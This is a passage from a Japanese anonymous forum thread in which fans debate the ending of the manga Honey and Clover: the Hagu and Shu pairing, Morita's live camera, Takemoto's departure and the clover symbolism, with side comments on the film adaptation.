ああいうネタも芸術に人生ささげて他人の人生まで貰おうとし始めた今になっては微妙。

760 :花と名無しさん:2006/07/29(土) 22:00:06 ID:???0
>>757
そだね、同意だ。
はぐみに対しても修はぐに対しても。

761 :花と名無しさん:2006/07/29(土) 22:00:34 ID:???0
それ言うなら、今までは金のためもあったとはいえ
森田だって一貫性ないし器用貧乏ぽいじゃん。

762 :花と名無しさん:2006/07/29(土) 22:01:43 ID:???O
恋愛なんて非常事態であってそんなにいいもんじゃないから。
時にはダメ人間さ加減が露呈するから。

ってのがテーマかな?

763 :花と名無しさん:2006/07/29(土) 22:03:58 ID:???O
はぐの怪我もリカの身の上も
不幸になったアテクシ
みんなに心配してもらえるアテクシ
をアピールしてるようにしか見えませんようみのセンセ。

764 :花と名無しさん:2006/07/29(土) 22:04:49 ID:???0
>>761
器用貧乏ではないな、
すくなくとも森田はCGの分野では大成してる。


765 :花と名無しさん:2006/07/29(土) 22:04:56 ID:???0
>時にはダメ人間さ加減が露呈するから。
「かっこわるい」ってのがメインテーマなのは確かだろう。

766 :花と名無しさん:2006/07/29(土) 22:05:49 ID:???0
ストーカーなんてどうあがいてもかっこ悪いもんな

767 :花と名無しさん:2006/07/29(土) 22:06:22 ID:???0
恋をすると背が伸びる、若返るってのがテーマでしょ?

768 :花と名無しさん:2006/07/29(土) 22:08:42 ID:???0
自己投影説は微妙だなと思う。
しかしとっても不幸エピソードが大好きということは感じ取れる。

769 :花と名無しさん:2006/07/29(土) 22:11:02 ID:???0
>>756
わかる。手にやたらと執着が見られる。
臭のタバコ持つ手、とかね。噛みあと、とかね。

770 :花と名無しさん:2006/07/29(土) 22:12:13 ID:???0
おっと
そういえば
最終話では臭の手の噛み痕はもうなくなってたの?
落ち着いちゃえばそんなもんか・・・

771 :花と名無しさん:2006/07/29(土) 22:17:02 ID:???0
見えないところを噛んでます。


772 :花と名無しさん:2006/07/29(土) 22:19:23 ID:???O
まさか……

773 :花と名無しさん:2006/07/29(土) 22:27:33 ID:???0
>>772
それ以上言うなw

774 :花と名無しさん:2006/07/29(土) 22:27:44 ID:???0
>>699
亀だが。
山田にとっての三代目軍団(&学内の鉄人親衛隊)と野宮は最初から
立ち位置というか土俵からして違うんじゃなかろうか。
はぐにとっての竹本と森田との関係にもそれと似ていると思う。

結局お友達や兄弟的存在からスタートした竹本と三代目軍団は男として扱ってもらえなかったが
最初にある程度のインパクトを与えつつ、男としてキメる所はきっちりキメた森田・野宮は
彼女たちの心を揺さぶることに成功した、と。
最初の時点で竹本の敗北が決まっていたと思うとやるせないが('A`)

775 :花と名無しさん:2006/07/29(土) 22:47:27 ID:???O
山田は誰でもいい訳じゃなく野宮が好きなんだよ。
行動がグズグスしてウザイだけで。

まあ25歳処女の初恋の失恋だから仕方ないじゃないか

776 :花と名無しさん:2006/07/29(土) 22:51:53 ID:???0
そういや結局山田の進路って花器制作と酒屋手伝いで確定?
もしかして最後の一年間も研究生じゃなくて窯を借りるついでで居ただけ?

777 :花と名無しさん:2006/07/29(土) 23:09:02 ID:???0
自分はこの後、そのうち臭がモニターで森田を見つめるはぐを頻繁に目にしたりなんやかんやしてるうちに
自分から身を引く・・・と勝手に都合よく解釈してるんだが。
単にはぐと森田がくっつく「その時」が、決して「今」(=最終回)ではなかった・・・みたいな。

以上、好意的に最終回を読んだ自分のひとことでした。

778 :花と名無しさん:2006/07/29(土) 23:17:55 ID:???O
作者の堺さん萌えを見ると
原田×リカ×修の大学時代の話とか書きたいんだろうなーと思う
はぐの幼少期の触れ合いを交えつつ

779 :花と名無しさん:2006/07/29(土) 23:21:31 ID:???0
最終回読んだ。
ここ見て予め覚悟は出来ていたけど意外とショック少なし。
はぐは「森田を見守る」ことを選んでるし実際見守ってるし
見守られてるのを実感してる森田はがんばるしかないし
天才森田ががんばれば結果が出てしまうんだろうしw

はぐはしゅうに芸術も森田を見守る生活も
全部含めて今後も滅私奉公の協力要請しただけみたいに読める。
しゅうの恋心を利用することになるから迷ってただけで…
だから最後のタケノコの独白「先生は自分で見つけられるから必要ない」に繋がるんじゃなかんべや

780 :花と名無しさん:2006/07/29(土) 23:29:35 ID:???0
スピンオフの主役は花本はぐ父、謎の男の実像に迫る!

781 :花と名無しさん:2006/07/29(土) 23:31:00 ID:???0
モニター監視とか、いくら伏線があったとしても異常じゃない?
それ、見守るとは普通言わないよ・・・・
もうみんな麻痺なのかな・・・ギャグだからよし?

782 :花と名無しさん:2006/07/29(土) 23:31:06 ID:???O
はぐと森田さんが良かったな〜。
映画はどうなったんだろ?
竹本くんは原作通り寺の修復らしいけど。


783 :花と名無しさん:2006/07/29(土) 23:32:26 ID:???0
ストーカー体質の作家がいて
ストーカー体質の読者が読む
みたいな

784 :花と名無しさん:2006/07/29(土) 23:35:01 ID:???0
>>779
うわー。めっちゃ胴衣やわ。
「先生は自分で見つけられるから必要ない」で自分もそうオモタ。
それで今度は修ちゃんが乗り越える時なんじゃないかと思ったよ。

要は物語は決して、解決はしてない。
そもそも最初っからこの物語は青春の1ページを描きたかっただけなわけで。多分。

785 :花と名無しさん:2006/07/29(土) 23:35:21 ID:???0
>781
自分はあのシーン見てようやく腑に落ちたのだけど麻痺してるのかな…?
はぐ臭恋愛オチっていうのがどうしても納得できなくて気持ち悪かったんだけどあのシーンで
「森田(の部屋)見て」嬉しそうなはぐと「嬉しそうなはぐ」を見て嬉しそうな臭見たらなんか納得できた。



786 :花と名無しさん:2006/07/29(土) 23:42:40 ID:???0
森田の部屋みてうれしそうなはぐ、って
臭の立場はどうなのよ。
リハビリすんだら用無し程度の男に
人生くださいとは、はぐ、どんだけひどい女だよw

787 :花と名無しさん:2006/07/29(土) 23:42:58 ID:???0
「いつか森田は胸張ってはぐの前に立って、そこから二人は恋愛する(かもしれない」
な先に期待もたせた結び方なんじゃないの?

修はぐは性的にどうこうじゃなくはぐの環境維持に一番適切な人材ってだけで。
修以外の人間は多かれ少なかれ「それぞれどっかに向けて動き出しました」てなエンドだし
惜しむらくは作者の説明不足と修萌えによる青春様騒ぎ。
あれがなければ「甘酸っぱい一時期を切り取った」でうまくまとめられたろうに。



788 :花と名無しさん:2006/07/29(土) 23:43:15 ID:???0
>>781
会社にライブカメラ設置してるだけだから異常ではないでしょう。
双方合意というか森田さんが「いつでものぞいてよ」って言ってるみたいだし。
実際にはサイトからのリンクで社内に設置してあるライブカメラを見られるようにしている
会社も海外にはあるから。

むしろ真山のせいでそういうストーカー的想像に繋がってしまうんじゃないかとも思う。

789 :花と名無しさん:2006/07/29(土) 23:46:52 ID:???0
>>786
いつか森田がはぐの前にちゃんと立つまでのツナギ的役割。
とか書くと一方的に可哀想な役割みたいだけどそれが臭の喜びなんだから本人は幸せでしょ。
そう考えると札束を押しつけた森田って…w


790 :花と名無しさん:2006/07/29(土) 23:51:30 ID:???0
漫画家とか小説家にとって新作の設定を考えるのは楽しい行為。
子供がノートに好きな絵を好きな設定で無心に描くのと通じる。
それを他人様の目に面白く映る作品に仕上げていくのが苦難の道のりなわけで、
ウミノとかいう三文作家のやってることはガキの落書きと一緒。
いくらもらってんだ、このヴォケは。

791 :花と名無しさん:2006/07/29(土) 23:52:01 ID:???0
>>777
自分もモニターを見るはぐを見る修の表情でそうだったらいいなと思った。
はぐが描けるようになって森田の足場が固まったら…って感じで。

でも作品中で修がはっきりそう言ってるわけじゃないから
たんなる願望みたいな解釈だけど。
最終回は良かったけどやっぱり森田とはぐが一緒に絵を描いたり
山田野宮みたいに幸せになるところが見たかったな。



792 :花と名無しさん:2006/07/29(土) 23:52:38 ID:???0
見守る=ライブカメラでいつでも見られる、っていうのが違和感なんだよ。
お互いの今後の作品や活躍で伝わってくるものを感じ取るのが見守ることだと思うから。
自分的にはこれもいらない設定だった。

793 :花と名無しさん:2006/07/29(土) 23:53:08 ID:???0
>786
リハビリ済んだら洋梨とは思ってないと思うよ。
はぐが造り続けるのには修ちゃん(雨)が必要だと言ってるだけで。
修ちゃんにはぐの芸術の犠牲になれって言ってるのと同義なのがわかってるから
「(代価を)払わないと」発言になってるんだろうし。
それに対しての竹田の「払う必要なし」発言だろう。

794 :花と名無しさん:2006/07/29(土) 23:56:57 ID:???0
>>792
別にカメラが森田本人に密着してるわけでなし
気配を感じ続けるというか「繋がっている」ことを実感してる表現ジャネ?
重要なのは「嬉しそうなはぐを嬉しそうに見守る臭」では?
マジで恋愛絡んでたらあんな風には見守れないでしょ

795 :花と名無しさん:2006/07/29(土) 23:58:53 ID:???0
>>781
ストーキングじゃなくって。
「今度いなくなるときはテレビカメラを置いていくよ」と山田に言ってたじゃん。
あれを実現して、仕事場のライブカメラをネット経由で見られるようにしてある。
それを真山か誰かのパソコンで、竹本の送別会の時にみんなで見てたの。
森田がいれば、ネットで生中継参加になるけれど、どっかいってていない。
みんなはボヤくけど、はぐは嬉しそうにその画面を覗き込んでる。
修ちゃんも、そんなはぐをにこやかに見てる。
ということです。

796 :花と名無しさん:2006/07/30(日) 00:00:49 ID:???0
修ちゃんが雨で森田が太陽なんだろうなあ
難しいな

797 :花と名無しさん:2006/07/30(日) 00:00:51 ID:???0
>787
>「いつか森田は胸張ってはぐの前に立って、そこから二人は恋愛する(かもしれない」
そしたらシュウはどうなる?天才同士が結ばれるまでの噛ませ犬か?

798 :花と名無しさん:2006/07/30(日) 00:01:50 ID:???0
>>797
先生は自分で見つけられる人なんだって

799 :花と名無しさん:2006/07/30(日) 00:02:56 ID:???0
ファンタジー風味な作品のハチクロで、ライブカメラを使用ってのは
なんかギャップのようなものを感じた

800 :花と名無しさん:2006/07/30(日) 00:03:31 ID:???0
手をかませるってかなり性的だと思うけど、そんな感じしないしね。
猫か何かを相手にしてるみたいだ。
はぐも森田もまだ子供なんだよ・・・

801 :花と名無しさん:2006/07/30(日) 00:05:17 ID:???0
>>799
ヤフオク、メール、アフォリエイト等、IT事情は今までも数多く出てきてたよ

802 :花と名無しさん:2006/07/30(日) 00:08:20 ID:???0
はぐ本人が自分が何かを生み出すのには
植物のとっての雨みたいに修ちゃんが必要なんだと気が付いたんだと思う。
森田との恋愛未満ははぐ本体に必要だけど、生み出すには修ちゃんが要る。
だから「人生下さい」「払わないと」発言。
それに対して竹田の「払わなくて(負い目に感じなくて)いいんだよ」発言
「人生下さい」と言われた時点で修にとっては本望だからってことでは?
ハチクロサンドは笑止でしかないけど、はぐが竹田の「ため」に行動した証だと思えば涙のわけも少しは納得できる(かも

803 :花と名無しさん:2006/07/30(日) 00:08:56 ID:???0
>>796
どっちも不可欠だからね…

804 :花と名無しさん:2006/07/30(日) 00:11:39 ID:???0
>>802
…つまりはぐは修に「藻前はワシの芸の肥やしになれやあ」と逝ったと
そして修はそれを「本望です!」と喜んで受けたと
ハチクロってそういう話だったの。。。

805 :花と名無しさん:2006/07/30(日) 00:13:03 ID:???0
>>802
でも、修がモンゴル行ってスランプに陥ったとき、森田に刺激受けて
創作意欲わいてた。
キリンを並んで見たあとも、桜の中でチッスしたあとも・・・・

806 :花と名無しさん:2006/07/30(日) 00:14:48 ID:???O
どっちみち修は はぐと芸術の世界にいるのが好きなんでしょ
恐らくそれ以上は望んでないだろうし
原田リカがいればまた違ったのかもな
と、言いたいが既に原田リカに微妙に嫉妬してたんだったなw
やはり 彼は例えはぐが森田を好きでも今の現状に大満足なんだろう
ある意味幸せ者で可哀想な人

807 :花と名無しさん:2006/07/30(日) 00:16:04 ID:???0
いまははぐが弱ってるから修だったってことなんだよね
セーフティネット。
一方森田は自分は燦然と上空にいながら、えらい下方にセーフティネット張った。
いまはぐがすがれるのは、普通な位置にいる修だったとゆう

808 :花と名無しさん:2006/07/30(日) 00:16:25 ID:???0
>805
>796がその答
そしてはぐ自身も太陽なので
いつか森田が大物になって太陽と雨の一人二役出来るようになるまでは修は必要

809 :花と名無しさん:2006/07/30(日) 00:17:22 ID:???0
じゃあはぐと森田と修と3人で暮らせばイイジャン
原田と理花とやってたみたいに。

810 :花と名無しさん:2006/07/30(日) 00:18:36 ID:???0
結局修はリカ原田と3人で過ごしてた時期(修の青春)に囚われ続けてるてことだろね…
はぐ森田修の三つ巴かぁ

811 :花と名無しさん:2006/07/30(日) 00:18:36 ID:???0
はぐには一生雨な人間がが必要なん?
森田がそれにならないといけないの?

812 :花と名無しさん:2006/07/30(日) 00:19:36 ID:???0
808補足
はぐ自身が雨も植物も太陽も内包するエンドもありだよね

813 :花と名無しさん:2006/07/30(日) 00:20:29 ID:???0
ああ・・・原田―理花―修
相似形で、森田―はぐ―修・・・もしこれで森田死亡エンドじゃ因果が過ぎるよ

814 :花と名無しさん:2006/07/30(日) 00:21:59 ID:???0
今現在のはぐは雨がないと作れないってことでしょ。
でもってはぐ自身が「作りたい」と切望する自分を認めたから雨が必要。
雨なしで作れるようになったら要らなくなるw

815 :花と名無しさん:2006/07/30(日) 00:22:18 ID:???0
答えなんか出そうもないけどな
だってこのマンガみんな性欲が前提じゃないんだもん

816 :花と名無しさん:2006/07/30(日) 00:24:40 ID:???0
修とはぐにそこまでの深い意味ないと思うが。
行き当たりばったりとしか思えないし。

817 :花と名無しさん:2006/07/30(日) 00:24:57 ID:???0
番外編で森田がはぐを迎えに来て臭が送り出すとかなら良いな。
それか森田死亡エンドだけどちび森田とはぐと臭の疑似親子でもいい。
原田の死でほんとはとっくに過ぎてる青春に留まってしまってる臭が歩き出す話が見たいよ。

818 :花と名無しさん:2006/07/30(日) 00:25:43 ID:???0
色々な解釈があって良いね

819 :花と名無しさん:2006/07/30(日) 00:27:34 ID:???0
そうだよはぐじゃなくてもっと大人の女を自分で見つければいいんだよ。
修が原田の死に縛られる意味って青春に縛られてるんだよね?
夢とか、そういうの。はぐで満たそうなんて、歩き出してないよな。

820 :花と名無しさん:2006/07/30(日) 00:30:45 ID:???O
>>817
みたくね

821 :花と名無しさん:2006/07/30(日) 00:31:43 ID:???O
>>819
>はぐで満たそうと


それちょっと違うような...^^;

822 :花と名無しさん:2006/07/30(日) 00:32:20 ID:???0
何かをこさえるていう業を持ってしまった人間の集団で
天才(森田とはぐ)は業に準じた。
はぐの場合自分の業の栄養に修が必要だから開き直って求めた。
森田は「はぐが見てる」を栄養にすることに決めた。
(見てることを実感するためにわざわざカメラ設置する念の入りようw)

天才じゃない竹田はそれでも作りたい業はあるので天才の栄養になることもできす離脱。
四葉は「ありがとう」」のメッセージ

823 :花と名無しさん:2006/07/30(日) 00:35:11 ID:???0
>>822
ちょwww竹田ってwww

たけのこがかわいそすぎじゃ!!

824 :花と名無しさん:2006/07/30(日) 00:35:50 ID:???0
みんなが足掻きながらも前に踏み出していくなかで
はぐと臭だけがお互いに囚われすぎて動けなくなっている
気がする。
竹本の「(臭に)返さなくていい」発言が、はぐの救いになって
いれば、臭だけがやはり動けないままなのかもしれない。

大学を辞めることが臭にとっての囚われ続けた青春との惜別に
なるかに見えて実は違った…なんて解釈が正しいとすれば
なんて残酷な結末なんだと思う。

825 :花と名無しさん :2006/07/30(日) 00:35:57 ID:???0
森田とたけのこは許す。
修はぐも100歩譲って許すとしよう。

しかしはぐが教えた、あのめがねの小学生がはぐに惚れてるみたいな描写の
イラストちょこちょこ入れてる、めがね小学生はぐは何だかかなり嫌だった。
あと修はモンゴル行った時はぐに似てたモンゴル幼女と
幼女が懐いてる兄貴をじぶんとはぐに見立てて
「お兄ちゃんとずっと一緒にいるのというのは叶わない望みだとみんなわかっていたけど」
みたいなポエムしてたのに修はぐじゃだめじゃん
もう書いててわけわからん

826 :花と名無しさん:2006/07/30(日) 00:36:04 ID:???0
>>659
CHAPTER.61 P20で、修ちゃん「あのな」の次に何言おうとしてたの?

827 :花と名無しさん:2006/07/30(日) 00:38:43 ID:???0
そっか、修は自分が何かを作るの諦めてるもんね
天才二人は自分が作るのが目的だし
リカはなんだかんだ言いながら真山栄養にして作ってる
真山はリカを快適に生かすことが目的だし
竹本は新しいものを無から作り出すのではなく既存の美しいものを復元することを選んだ

828 :花と名無しさん:2006/07/30(日) 00:39:48 ID:???0
そうなると修がまた居場所がなくなって自分探しに出ようとしてカップル二人が捜索に来るという切ない構図がw

829 :花と名無しさん:2006/07/30(日) 00:40:58 ID:???0
>827
ねえ、山田は?
野宮は作り出す集団じゃないからいいけど山田は?

830 :花と名無しさん:2006/07/30(日) 00:45:15 ID:???0
みんな、誰かに誉めらたり、おだてられたり、期待されないと頑張れないんだよね。
森田はいままで、お兄ちゃんがコンプレックス持ってて金儲けの才能しか誉めてくれなかったようだし
そのとおりにやってきたのに復讐が達成されたらやることなくなった。
これはたけのこが母のために生きようと思ってたのに再婚されてあてを失ったときと同じ。
ああ、たけのこはひとりで解脱したのに、森田ははぐに見ててもらうんだ。
(まあそのはぐは修ちゃんに見ててもらうんだが)
たけのこたけのこ可哀想。頑張れきっといい子が見つかるよ。

831 :花と名無しさん:2006/07/30(日) 00:46:09 ID:???0
>>828
森田とカオルが知らぬ間に修にGPS機能を内蔵するので大丈夫です☆

832 :花と名無しさん:2006/07/30(日) 00:47:02 ID:???0
>829
山田はそのうち子供を産むから良いの。

833 :花と名無しさん:2006/07/30(日) 00:49:15 ID:???0
あー
スラムダンク萌えだったわけだから、ライバルというか好敵手同士萌えなんだよな。

834 :花と名無しさん:2006/07/30(日) 00:50:07 ID:???0
山田は芸術家じゃなくて職人タイプなのかな。

835 :花と名無しさん :2006/07/30(日) 00:50:28 ID:???0
森田とくっついても絶対うまくいかなさそう。
お互い相手にそうそう合わせられないし。
高村光太郎と千恵子みたいにぶっ壊れちゃいそう。

836 :花と名無しさん:2006/07/30(日) 00:52:46 ID:???0
竹本も職人タイプ。

837 :花と名無しさん:2006/07/30(日) 00:53:02 ID:???O
結局 最後まで見守る側だよな修は
ちょっとはぐと一緒にいたいって自分の気持ちだして前進したみたいだが

リカと原田がいた時はどんな気持ちだったんだろ
3人で世界をみたいとか思ってたんだろうかw哀れな奴だ

838 :花と名無しさん:2006/07/30(日) 00:53:29 ID:BDnOGN0T0
>>672
学園祭から4・5ヵ月経ったから
リハビリ順調ってことでしょ。

839 :花と名無しさん:2006/07/30(日) 00:55:22 ID:???0
森田も細やかに人に気を使うことくらいできそうな描写もあるんだけどねー
はぐ相手だと何かが暴れだすようで、ちゃんとしたコミュニケーションって
あまり例がないからな…
なのに抱き合って深い話ができるのが直感同士というか…

840 :花と名無しさん:2006/07/30(日) 00:56:27 ID:???0
なんか納得w
結局天才は作品が自分の子だから生きた子供や子供作る行為は必要なさげ。
天才の栄養になることを選んだヤツも同じ
竹本はいずれいい父親になるw

841 :花と名無しさん:2006/07/30(日) 01:00:52 ID:???0
とりあえず作者は森田死亡だろうが修はぐ展開だろうが、
つまりは森はぐをくっつけたくなかったんでしょ?
せつなさ萌えで。
また会えるよーっって感じになって良かった。スピッツ乙。


842 :花と名無しさん:2006/07/30(日) 01:01:33 ID:???0
原田と理花を見ていると、はぐがもし全ての要素を考えた上で修以外の人間を選ぶとしたら
森田だけでも竹本だけでもダメなんだと思った
というか森田・竹本2人セットでようやく1人前ってことなんだろうなあと

森田も竹本みたいに凡人じゃないから、自分を捨てて相手に合わせられるわけではないし
竹本も森田みたいに天才じゃないから、創作の部分ではぐに色々なものを与えることが出来ない

そこを考えると原田と理花・修の関係は将来の3人の関係をそのまま表しているのかもしれないね

843 :花と名無しさん:2006/07/30(日) 01:01:52 ID:???0
>837
原田が尋常じゃなく大きかったから
リカと修を抱えてなお自分の作品を生む余裕があったんだよ

844 :花と名無しさん:2006/07/30(日) 01:03:35 ID:???0
いや原田だってリカと修を栄養にしてたのかもしれないよ。

845 :花と名無しさん:2006/07/30(日) 01:05:03 ID:???0
臭は原田を目指すしかないんだと思う。
いまさら普通の恋愛はできないし何より本人にやる気なさそうだし。

846 :花と名無しさん:2006/07/30(日) 01:08:25 ID:???0
もうわけがわからなくなってきましたw
森田も囲えということですか?

847 :花と名無しさん:2006/07/30(日) 01:08:52 ID:???O
もしかしたら
原田リカ修みたいになってたかもね
森田はぐ竹本は
これでよかったのかもな
原田→森田
リカ→はぐ
修→竹本

848 :花と名無しさん:2006/07/30(日) 01:10:18 ID:???0
>>847
森田死ぬ前提!?

849 :花と名無しさん:2006/07/30(日) 01:11:51 ID:???0
はぐ・・・わたしお花
修・・・・雨
森田・・・太陽
竹本・・・ちょっと振り向いてみただけの通行人
真山・・・メガネ
山田・・・ハト胸

850 :花と名無しさん :2006/07/30(日) 01:13:09 ID:???0
最終的には結ばれないし上手く行かないとは思うが
もう少し森田はぐも見たかったなぁ
全然なかったよね
一緒に画材買いにいって物食べれなくて全然楽しくなかったというのと
マフラーまいてキスしたのと最後らへんの話で抱きしめただけか・・・
たけのこはもっとないけど。

851 :花と名無しさん:2006/07/30(日) 01:13:33 ID:YkEtnsQk0
今日映画観た。
森田さん別人・・・。なぜ口の下にピアス?耳にでかいピアス??
はぐ・・・私の嫌いなCMの子・・・。観てるだけでむかつく。
友達に合わせて観てしまった。
原作のイメージ崩れるから嫌だったのに。
私は「ラブコン」観たかったのに。
これは原作は読んでないし小池徹平くん好きだから。
映画って観る理由はほとんどこれだよね。


852 :花と名無しさん:2006/07/30(日) 01:14:09 ID:???0
修はぐの恋愛はいいんじゃないかと思う。
自分はきのうまで内容を全く知らなかった。
映画で話題になってるから原作はどんな話だろうと気になって
調べたら主人公とくっつきそうなのは本命ぽい竹本ではなくて森田とゆーことだった。
そしてこのスレにきたら親代わりの人とくっついたということでかなりビックリした。
公式HPで「親代わりで溺愛している」とあったから無意識に主人公の相手候補から外してたし。





853 :花と名無しさん:2006/07/30(日) 01:15:06 ID:???0
あらすじ読んだだけだけど、竹本最初から最後まで蚊帳の外かよ
ハグとは大したイベントもなく、行くべき道も見つけたのは一人旅w
それにしても絵が細くなったというか、小奇麗になったというか
7巻くらいまでのちょっとガサツな感じが好きだったのに

854 :花と名無しさん :2006/07/30(日) 01:15:16 ID:???0
映画はぐて高校教師で上戸あやと出てた子だっけ。
上戸って凄い顔が小さくて可愛いんだなあと思ったっけ。

855 :花と名無しさん:2006/07/30(日) 01:15:53 ID:YkEtnsQk0
マフラーまいてキスしてたの?
巻いただけかと思っていた・・・・。

856 :花と名無しさん:2006/07/30(日) 01:17:28 ID:???O
あれで漫画終わったのか?

857 :花と名無しさん:2006/07/30(日) 01:18:52 ID:???0
忘れられがちだけど、森田からのプレゼント
ミウミウのミュールと、小鳥のブローチと、手編みのマフラー。

858 :花と名無しさん:2006/07/30(日) 01:19:50 ID:???0
最終的にも上手く行きそうな気もするけどな。
二人がもうちょっとずつ大人になればね。

859 :花と名無しさん:2006/07/30(日) 01:20:05 ID:YkEtnsQk0
高校教師に出てたのはソニンしか覚えとらん。
イオンのカードのCMに出てる子で、自分がカードとか嫌いなせいか
やたら鼻につくんだよ・・・。
てかこの手のタイプが嫌いと言うか・・・。

860 :花と名無しさん:2006/07/30(日) 01:21:01 ID:???0
あんた映画板にお行きよ。

861 :花と名無しさん:2006/07/30(日) 01:22:31 ID:???0
アニメのEDの最後で
「修のシルエットが消えて 竹本のシルエットに四葉のクローバーが重なる」
という演出がなされているのには何か意味があるのか?
みたいな話題がだいぶ前に出ていたのを思い出した。

以前、修にあげようと思ったときは見つからず
今回(竹本へ)は見つかった・・・
という、漫画内におけるエピソード
       ||
修にとっての、はぐという存在に内在する幸せ(奇跡)とは、自分で見つけ出すもの(最後にそれが許された)
竹本にとってのそれは、
彼女の存在を通してぐるぐる回って悩み抜いてきた自分自身そのものだった(最後にそれに気づいた)

・・・みたいなところに帰結するんかなと、最終回読んで勝手に思っている。
「えっ森田は?」て感じだが、奴は既に、
彼女と精神的に(天才という)同次元に立ってしまっていた(だが向き合うことができていなかった)ので
そういう意味では作品内でもやはりどこか違う場所に奴のキャラは置かれていたんだろう。

「修の恋愛ドッキリが、最終回ではまるで無かったことのようになっていた(プゲラ」のが
修のシルエットが消える演出に繋がっている・・・
と読むのは皮肉すぎるかw

862 :花と名無しさん:2006/07/30(日) 01:23:45 ID:???0
>>847
原田→森田
リカ→はぐ
修→臭

おちょくってるわかじゃないよ

863 :花と名無しさん:2006/07/30(日) 01:27:21 ID:???0
>>861
なんか、すごいね。

864 :花と名無しさん:2006/07/30(日) 01:30:07 ID:YkEtnsQk0
え?ハチクロってもう最終回したの?
はまったばっかりなんですけど。

865 :花と名無しさん:2006/07/30(日) 01:31:15 ID:???0
>>861
>「修の恋愛ドッキリが、最終回ではまるで無かったことのようになっていた(プゲラ」のが
>修のシルエットが消える演出に繋がっている・・・

これはこれで、原作とアニメによる壮大な?ギャグのコラボレーションだな

だが、笑えるかもしれないけど 泣 け て く る (^^)

866 :花と名無しさん:2006/07/30(日) 01:31:39 ID:???0
>>849
下2行w

867 :花と名無しさん:2006/07/30(日) 01:33:53 ID:???0
>>861
単に、去ってくことができる人にだけあげられた「good luck」=四つ葉
なんじゃないのかな。

868 :花と名無しさん:2006/07/30(日) 01:38:33 ID:???0
修のモンゴル行で四つ葉が見つからなかったのは
修にとってははぐの存在が四つ葉(幸せ)だから

タケノコの時はこれでもかといわんばかりにたくさんたくさん四つ葉が見つかったのは
竹田が全くの語り部で蚊帳の外だから
だから竹田は「もう戻れない」ことを突きつけられて涙する


869 :花と名無しさん:2006/07/30(日) 01:40:10 ID:???0
いや、修が青春にとらわれて不幸だから見つからなかったんだよ

870 :花と名無しさん:2006/07/30(日) 01:40:29 ID:???0
861です

>>867
なるほどそういう捉え方も良いねぇ!
いろんな人の知見に触れることができて楽しいよ。

>>868
たけもちょ…

871 :花と名無しさん:2006/07/30(日) 01:40:32 ID:???O
つか、スピンオフの話って何
どうせ野宮&あゆ描きたいだけだろ

872 :花と名無しさん:2006/07/30(日) 01:42:51 ID:???0
山崎と美和子を、野宮&山田サイドも交えつつ・・・てとこじゃないの?

873 :花と名無しさん :2006/07/30(日) 01:43:36 ID:???0
森田とそくーりの森田パパは結婚できたから
森田も結婚できるんかな

874 :花と名無しさん:2006/07/30(日) 01:44:53 ID:???0
>869
あの気持ち悪い青春様祭りはほんとの青春時代にリカ原田の傍観者に徹してそこから動けなくなってしまった修の「やり直し」だと思った。

875 :花と名無しさん:2006/07/30(日) 01:45:51 ID:???0
せめて竹本にも、クローバーはお守り袋に入れるみたいなことをしてあげて欲しかったw

876 :花と名無しさん:2006/07/30(日) 01:46:52 ID:???0
本編主人公て「はぐ、山田、竹田」の3人?
だとしたらスピンオフで修もあり?

877 :花と名無しさん:2006/07/30(日) 01:48:57 ID:???0
>>875
自分は竹本が四つ葉を見つけた(サンド引っぺがして)がミソじゃないかとオモたのであれでよしw

878 :花と名無しさん:2006/07/30(日) 01:49:22 ID:???0
ろりあえず、
修の「境目」エピには触れてくると思うんだが。>スピンオフ

879 :花と名無しさん:2006/07/30(日) 01:51:43 ID:???0
>>877
ひっぺがして一応中身確認しておかないと何が入ってるか分らんからなァ…

880 :878 orz:2006/07/30(日) 01:52:04 ID:???0
×ろりあえず
○とりあえず

もう寝よう…ヤバス

881 :花と名無しさん:2006/07/30(日) 01:53:55 ID:???0
番外編は山崎の恋の行方や野宮の過去の恋愛をそれぞれ短編で…
とのことだから修の境目のフォローは無いんでは?

882 :花と名無しさん:2006/07/30(日) 02:06:01 ID:???O
>>852
知らんくせに安易に肯定すんな

883 :花と名無しさん:2006/07/30(日) 02:10:34 ID:d9Q0rZDp0
>852
過去スレ読んでから書き込め

884 :花と名無しさん:2006/07/30(日) 02:14:48 ID:???0
急に852叩きが始まったw

885 :花と名無しさん:2006/07/30(日) 02:15:26 ID:???0
オートバイを強奪する目的で転倒させ、2人を死傷させたとして

886 :花と名無しさん:2006/07/30(日) 02:16:33 ID:???O
>>883
偉そうなこと言いたいならsageようね?
とりあえず>>1から嫁。

887 :花と名無しさん:2006/07/30(日) 02:40:43 ID:???0
遅レスだけど
>>826
「描き続けることができるようにちゃんとリハビリして、」
(あの時点で、描く事に対するはぐの結論を修は知らない)
「さらに将来的にも広い舞台で創作活動をしてほしい」
(もちろん俺がサポートするから、という前提で)

みたいなことを、(休職届出したこととかはぐの実家の状況とか持ち出したりして)
それとなく遠まわしに言おうとしたか、
または直球で言おうとしたか・・・

でも前者だと、
はぐが修に対し罪悪感を抱いてしまう要素が再び生じるだけなので
おそらく後者かな。
修というキャラの行動原理からは若干dでることになるけど
まぁあの状況だし。

888 :花と名無しさん:2006/07/30(日) 02:51:16 ID:???0

例のアパート、また家賃下がってたんだ・・・

38,000→36,000→34,000

889 :花と名無しさん:2006/07/30(日) 02:55:16 ID:???0
あ、ほんとだ。。。

890 :花と名無しさん:2006/07/30(日) 03:54:25 ID:???0
きちんと住んでいるのが二人だけだからなんじゃね

891 :花と名無しさん:2006/07/30(日) 04:01:15 ID:???0
羽海野って今何才?
美術系予備校通ってたのかなとも思ったけど
高校在学中にデビューってことはそれはないのかな。


892 :花と名無しさん:2006/07/30(日) 04:01:54 ID:???0
40代だっけ?

893 :花と名無しさん:2006/07/30(日) 04:17:52 ID:???0
最後に竹本がボロアパート(青春の始まり?)
から就職先に旅立つのは良かった。
ハチクロサンドはあまりにこじつけっぽくて何だけど。

臭はぐエピはいらなかったと思う。
ウミノさんも読者の反響で最終回を変えた様な感じがしたなぁ。

894 :花と名無しさん:2006/07/30(日) 07:33:04 ID:???O
この最終回
アニメじゃ 演出どうなるかなぁ
ED曲が流れるとしたら
今回のED?ワルツ?初代OP?
早くアニメでみてえ

895 :花と名無しさん:2006/07/30(日) 07:39:15 ID:???O
>>891
デザイン科のある高校出てサンリオに就職した
今は30代後半
漫画家デビューはハチクロ
その前はスラダンなどのパロ同人誌出してました

896 :花と名無しさん:2006/07/30(日) 07:45:35 ID:???0
今最終回読んだ。
それなりに感動するけど、森田兄弟の件は別だとしても、
野宮が出てきて、たけのこの旅が終わっていれば
どっからでも繋げられる終わりって感じ。
